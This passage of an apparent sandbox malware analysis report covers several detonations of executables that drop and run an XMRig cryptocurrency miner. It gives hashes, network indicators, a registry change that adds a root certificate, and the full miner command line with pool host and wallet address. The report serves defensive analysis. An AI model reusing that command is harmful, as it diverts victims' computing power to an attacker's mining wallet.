Max time network

1802s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 98.56.20.217.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/636-16-0x0000023597370000-0x0000023597390000-memory.dmp

memory/636-17-0x00000235973C0000-0x00000235973E0000-memory.dmp

memory/636-18-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-20-0x0000023597400000-0x0000023597420000-memory.dmp

memory/636-19-0x00000235973E0000-0x0000023597400000-memory.dmp

memory/636-21-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-22-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-23-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-25-0x0000023597400000-0x0000023597420000-memory.dmp

memory/636-24-0x00000235973E0000-0x0000023597400000-memory.dmp

memory/636-26-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-27-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-28-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-29-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-30-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-31-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-32-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-33-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-34-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-35-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-36-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-37-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-38-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-39-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-40-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-41-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-42-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-43-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-44-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-45-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-46-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-47-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-48-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-49-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-50-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-51-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-52-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-53-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-54-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-55-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-56-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-57-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-58-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-59-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-60-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-61-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-62-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-63-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-64-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-65-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-66-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-67-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-68-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-69-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-70-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-71-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-72-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-73-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-74-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-75-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-76-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-77-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-78-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-79-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-80-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-81-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-82-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-83-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

memory/636-84-0x00007FF6D29E0000-0x00007FF6D34E3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1795s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 19.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.16.208.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/536-16-0x0000019C3A050000-0x0000019C3A070000-memory.dmp

memory/536-17-0x0000019C3A0A0000-0x0000019C3A0C0000-memory.dmp

memory/536-18-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-20-0x0000019C3A0C0000-0x0000019C3A0E0000-memory.dmp

memory/536-19-0x0000019C3A0E0000-0x0000019C3A100000-memory.dmp

memory/536-21-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-22-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-25-0x0000019C3A0C0000-0x0000019C3A0E0000-memory.dmp

memory/536-24-0x0000019C3A0E0000-0x0000019C3A100000-memory.dmp

memory/536-23-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-26-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-27-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-28-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-29-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-30-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-31-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-32-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-33-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-34-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-35-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-36-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-37-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-38-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-39-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-40-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-41-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-42-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-43-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-44-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-45-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-46-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-47-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-48-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-49-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-50-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-51-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-52-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-53-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-54-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-55-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-56-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-57-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-58-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-59-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-60-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-61-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-62-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-63-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-64-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-65-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-66-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-67-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-68-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-69-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-70-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-71-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-72-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-73-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-74-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-75-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-76-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-77-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-78-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-79-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-80-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-81-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-82-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-83-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

memory/536-84-0x00007FF7B0540000-0x00007FF7B1043000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-22 15:12

Reported

2024-05-22 16:22

Platform

win10v2004-20240426-en

Max time kernel

1798s

Max time network

1794s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
